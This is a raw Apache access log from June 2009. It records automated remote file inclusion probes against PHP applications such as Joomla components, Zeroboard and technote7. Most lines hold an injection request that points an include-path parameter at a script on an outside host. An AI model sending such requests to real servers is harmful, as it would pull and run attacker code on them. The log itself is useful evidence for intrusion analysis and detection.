60.43.229.5 - - [27/Jun/2009:11:54:27 -0500] "GET /logs/access_log.1239926400//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 333 "-""Mozilla/5.0"
60.43.229.5 - - [27/Jun/2009:11:54:27 -0500] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 306 "-""Mozilla/5.0"
89.223.3.98 - - [27/Jun/2009:11:56:05 -0500] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
89.223.3.98 - - [27/Jun/2009:11:56:05 -0500] "GET /logs/access_log.1233705600/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 367 "-""Mozilla/5.0"
89.223.3.98 - - [27/Jun/2009:11:56:05 -0500] "GET /logs/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
89.223.3.98 - - [27/Jun/2009:11:56:07 -0500] "GET /logs/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
89.223.3.98 - - [27/Jun/2009:11:56:07 -0500] "GET /logs/access_log.1233705600/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 367 "-""Mozilla/5.0"
89.223.3.98 - - [27/Jun/2009:11:56:07 -0500] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:56:14 -0500] "GET /logs/access_log.1240963200/outlogin.php?_zb_path=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
60.43.229.5 - - [27/Jun/2009:11:56:42 -0500] "GET /logs/access_log.1240358400//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 333 "-""Mozilla/5.0"
89.223.3.98 - - [27/Jun/2009:11:56:43 -0500] "GET /logs/access_log.1237161600/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 367 "-""Mozilla/5.0"
89.223.3.98 - - [27/Jun/2009:11:56:44 -0500] "GET /logs/access_log.1237161600/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 367 "-""Mozilla/5.0"
217.147.29.190 - - [27/Jun/2009:11:56:54 -0500] "GET //components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
217.147.29.190 - - [27/Jun/2009:11:56:54 -0500] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
217.147.29.190 - - [27/Jun/2009:11:56:54 -0500] "GET /logs/access_log.1241827200//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
217.147.29.190 - - [27/Jun/2009:11:56:54 -0500] "GET /logs/access_log.1241913600//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
60.43.229.5 - - [27/Jun/2009:11:58:13 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 312 "-""Mozilla/5.0"
60.43.229.5 - - [27/Jun/2009:11:58:13 -0500] "GET /logs/access_log.1241740800//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 339 "-""Mozilla/5.0"
60.43.229.5 - - [27/Jun/2009:11:58:13 -0500] "GET /logs/access_log.1241654400//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 339 "-""Mozilla/5.0"
60.43.229.5 - - [27/Jun/2009:11:58:14 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 317 "-""Mozilla/5.0"
123.143.98.5 - - [27/Jun/2009:11:58:20 -0500] "GET /logs/convert/mvcw.php?vwar_root=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
123.143.98.5 - - [27/Jun/2009:11:58:21 -0500] "GET /logs/access_log.1231891200/convert/mvcw.php?vwar_root=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
123.143.98.5 - - [27/Jun/2009:11:58:21 -0500] "GET /convert/mvcw.php?vwar_root=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
123.143.98.5 - - [27/Jun/2009:11:58:27 -0500] "GET /logs/access_log.1236038400/convert/mvcw.php?vwar_root=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
123.143.98.5 - - [27/Jun/2009:11:58:29 -0500] "GET /logs/convert/mvcw.php?vwar_root=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
123.143.98.5 - - [27/Jun/2009:11:58:30 -0500] "GET /logs/access_log.1231891200/convert/mvcw.php?vwar_root=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
123.143.98.5 - - [27/Jun/2009:11:58:30 -0500] "GET /convert/mvcw.php?vwar_root=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
123.143.98.5 - - [27/Jun/2009:11:58:34 -0500] "GET /logs/access_log.1236038400/convert/mvcw.php?vwar_root=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
60.43.229.5 - - [27/Jun/2009:11:59:58 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 312 "-""Mozilla/5.0"
60.43.229.5 - - [27/Jun/2009:11:59:58 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 317 "-""Mozilla/5.0"
60.43.229.5 - - [27/Jun/2009:11:59:58 -0500] "GET /logs/access_log.1241654400//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 339 "-""Mozilla/5.0"
60.43.229.5 - - [27/Jun/2009:11:59:59 -0500] "GET /logs/access_log.1241740800//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 339 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:12:01:58 -0500] "GET /logs/outlogin.php?_zb_path=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:12:01:58 -0500] "GET /outlogin.php?_zb_path=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:12:01:58 -0500] "GET /logs/access_log.1230940800/outlogin.php?_zb_path=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:12:02:02 -0500] "GET /logs/access_log.1230940800/outlogin.php?_zb_path=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:12:02:02 -0500] "GET /logs/outlogin.php?_zb_path=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:12:02:02 -0500] "GET /outlogin.php?_zb_path=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:12:02:02 -0500] "GET /logs/access_log.1230940800/outlogin.php?_zb_path=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:12:02:02 -0500] "GET /outlogin.php?_zb_path=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:12:02:02 -0500] "GET /logs/outlogin.php?_zb_path=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
216.17.99.13 - - [27/Jun/2009:12:02:47 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
216.17.99.13 - - [27/Jun/2009:12:02:47 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.17.99.13 - - [27/Jun/2009:12:02:47 -0500] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:12:02:52 -0500] "GET /?_zb_path=http://aboutav.com//id2.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
83.98.209.71 - - [27/Jun/2009:12:02:52 -0500] "GET /logs/access_log.1230940800/?_zb_path=http://aboutav.com//id2.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
83.98.209.71 - - [27/Jun/2009:12:02:53 -0500] "GET /logs/?_zb_path=http://aboutav.com//id2.txt??? HTTP/1.1" 200 194912 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
83.98.209.71 - - [27/Jun/2009:12:03:02 -0500] "GET /logs/access_log.1237248000/?_zb_path=http://aboutav.com//id2.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
216.17.99.13 - - [27/Jun/2009:12:03:15 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.17.99.13 - - [27/Jun/2009:12:03:15 -0500] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
216.17.99.13 - - [27/Jun/2009:12:03:15 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
216.17.99.13 - - [27/Jun/2009:12:03:20 -0500] "GET /logs/access_log.1232841600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
212.241.249.222 - - [27/Jun/2009:12:03:43 -0500] "GET //bbs/outlogin.php?_zb_path=http://www.ssp3.ilawa.pl/images/zoom/.bjc/logs/uk1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
218.38.136.16 - - [27/Jun/2009:12:04:54 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/left.txt??? HTTP/1.1" 200 194918 "-""libwww-perl/5.79"
218.38.136.16 - - [27/Jun/2009:12:04:55 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/left.txt??? HTTP/1.1" 200 3246 "-""libwww-perl/5.79"
201.232.54.48 - - [27/Jun/2009:12:05:17 -0500] "GET /logs/access_log.1230422400//include/write.php?dir=http://rsh.kiev.ua/images/idfx2.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
201.232.54.48 - - [27/Jun/2009:12:05:17 -0500] "GET /logs//include/write.php?dir=http://rsh.kiev.ua/images/idfx2.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
201.232.54.48 - - [27/Jun/2009:12:05:17 -0500] "GET //include/write.php?dir=http://rsh.kiev.ua/images/idfx2.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:12:05:35 -0500] "GET /?_zb_path=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
83.98.209.71 - - [27/Jun/2009:12:05:35 -0500] "GET /logs/access_log.1230940800/?_zb_path=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
83.98.209.71 - - [27/Jun/2009:12:05:35 -0500] "GET /logs/access_log.1237248000/?_zb_path=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
83.98.209.71 - - [27/Jun/2009:12:05:36 -0500] "GET /logs/?_zb_path=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 200 194912 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
83.98.209.71 - - [27/Jun/2009:12:07:01 -0500] "GET /logs/access_log.1240358400/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
83.98.209.71 - - [27/Jun/2009:12:07:01 -0500] "GET /logs/access_log.1239926400/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
83.98.209.71 - - [27/Jun/2009:12:07:01 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
83.98.209.71 - - [27/Jun/2009:12:07:01 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
201.232.54.48 - - [27/Jun/2009:12:07:53 -0500] "GET //include/write.php?dir=http://rsh.kiev.ua/images/idfx2.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
201.232.54.48 - - [27/Jun/2009:12:07:53 -0500] "GET /logs/access_log.1230422400//include/write.php?dir=http://rsh.kiev.ua/images/idfx2.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
201.232.54.48 - - [27/Jun/2009:12:07:53 -0500] "GET /logs//include/write.php?dir=http://rsh.kiev.ua/images/idfx2.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:12:08:28 -0500] "GET /logs/access_log.1242000000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
83.98.209.71 - - [27/Jun/2009:12:08:46 -0500] "GET /logs/access_log.1241827200//[adminbot_path]/lib/live_status.lib.php?ROOT=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:12:08:46 -0500] "GET /logs//[adminbot_path]/lib/live_status.lib.php?ROOT=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:12:08:46 -0500] "GET //[adminbot_path]/lib/live_status.lib.php?ROOT=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:12:08:47 -0500] "GET /logs//[adminbot_path]/lib/live_status.lib.php?ROOT=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:12:08:47 -0500] "GET //[adminbot_path]/lib/live_status.lib.php?ROOT=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:12:08:47 -0500] "GET /logs/access_log.1241827200//[adminbot_path]/lib/live_status.lib.php?ROOT=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
91.198.32.3 - - [27/Jun/2009:12:09:08 -0500] "GET /logs/access_log.1236211200/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 374 "-""libwww-perl/5.805"
91.198.32.3 - - [27/Jun/2009:12:10:14 -0500] "GET /logs/access_log.1230768000/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 374 "-""libwww-perl/5.805"
83.98.209.71 - - [27/Jun/2009:12:10:29 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
83.98.209.71 - - [27/Jun/2009:12:10:29 -0500] "GET /logs/access_log.1240358400/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
83.98.209.71 - - [27/Jun/2009:12:10:29 -0500] "GET /logs/access_log.1239926400/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
83.98.209.71 - - [27/Jun/2009:12:10:29 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
119.93.90.155 - - [27/Jun/2009:12:11:02 -0500] "GET /logs//[adminbot_path]/lib/live_status.lib.php?ROOT=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
119.93.90.155 - - [27/Jun/2009:12:11:04 -0500] "GET //[adminbot_path]/lib/live_status.lib.php?ROOT=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
66.249.68.42 - - [27/Jun/2009:12:11:26 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
66.249.68.42 - - [27/Jun/2009:12:11:27 -0500] "GET /?M=A HTTP/1.1" 200 3245 "-""SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
218.30.100.97 - - [27/Jun/2009:12:11:34 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
218.30.100.97 - - [27/Jun/2009:12:11:34 -0500] "GET /logs/access_log.1237766400//components/com_flyspray/startdown.php?file=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
218.30.100.97 - - [27/Jun/2009:12:11:34 -0500] "GET //components/com_flyspray/startdown.php?file=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.17.99.13 - - [27/Jun/2009:12:11:44 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 317 "-""libwww-perl/5.826"
216.17.99.13 - - [27/Jun/2009:12:11:44 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 312 "-""libwww-perl/5.826"
218.30.100.97 - - [27/Jun/2009:12:12:03 -0500] "GET /logs/access_log.1237680000//components/com_flyspray/startdown.php?file=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:12:12:10 -0500] "GET /logs/access_log.1242000000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
91.198.32.3 - - [27/Jun/2009:12:12:14 -0500] "GET /logs/access_log.1232064000/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 374 "-""libwww-perl/5.805"
91.198.32.3 - - [27/Jun/2009:12:15:10 -0500] "GET /logs/access_log.1231459200/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 374 "-""libwww-perl/5.805"
91.198.32.3 - - [27/Jun/2009:12:15:11 -0500] "GET /logs/access_log.1231545600/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 374 "-""libwww-perl/5.805"
218.30.100.97 - - [27/Jun/2009:12:15:36 -0500] "GET /logs/access_log.1237766400//components/com_flyspray/startdown.php?file=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
218.30.100.97 - - [27/Jun/2009:12:15:36 -0500] "GET //components/com_flyspray/startdown.php?file=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
218.30.100.97 - - [27/Jun/2009:12:15:36 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
218.30.100.97 - - [27/Jun/2009:12:16:39 -0500] "GET /logs/access_log.1237680000//components/com_flyspray/startdown.php?file=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
87.20.85.87 - - [27/Jun/2009:12:17:25 -0500] "GET //?path%5Bdocroot%5D=http://87.117.231.182/fx29id.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
87.20.85.87 - - [27/Jun/2009:12:17:29 -0500] "GET /logs/access_log.1239408000//?path%5Bdocroot%5D=http://87.117.231.182/fx29id.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
87.20.85.87 - - [27/Jun/2009:12:17:30 -0500] "GET /logs//?path%5Bdocroot%5D=http://87.117.231.182/fx29id.txt??? HTTP/1.1" 200 194917 "-""Mozilla/5.0"
217.147.29.190 - - [27/Jun/2009:12:18:09 -0500] "GET /logs/index2.php?p=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
217.147.29.190 - - [27/Jun/2009:12:18:09 -0500] "GET /logs/access_log.1238630400/index2.php?p=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
217.147.29.190 - - [27/Jun/2009:12:18:09 -0500] "GET /index2.php?p=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
87.20.85.87 - - [27/Jun/2009:12:18:39 -0500] "GET /logs/access_log.1241740800//?path%5Bdocroot%5D=http://87.117.231.182/fx29id.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
131.203.76.246 - - [27/Jun/2009:12:19:09 -0500] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
131.203.76.246 - - [27/Jun/2009:12:19:09 -0500] "GET /logs/access_log.1230768000/tools/send_reminders.php?noSet=0&includedir=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
131.203.76.246 - - [27/Jun/2009:12:19:09 -0500] "GET /logs/access_log.1229299200/tools/send_reminders.php?noSet=0&includedir=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
131.203.76.246 - - [27/Jun/2009:12:19:09 -0500] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:12:19:57 -0500] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:12:19:57 -0500] "GET /logs/access_log.1240358400//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:12:19:57 -0500] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:12:20:08 -0500] "GET /logs/access_log.1239926400//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:12:20:27 -0500] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:12:20:27 -0500] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:12:20:28 -0500] "GET /logs/access_log.1240358400//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:12:20:31 -0500] "GET /logs/access_log.1239926400//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
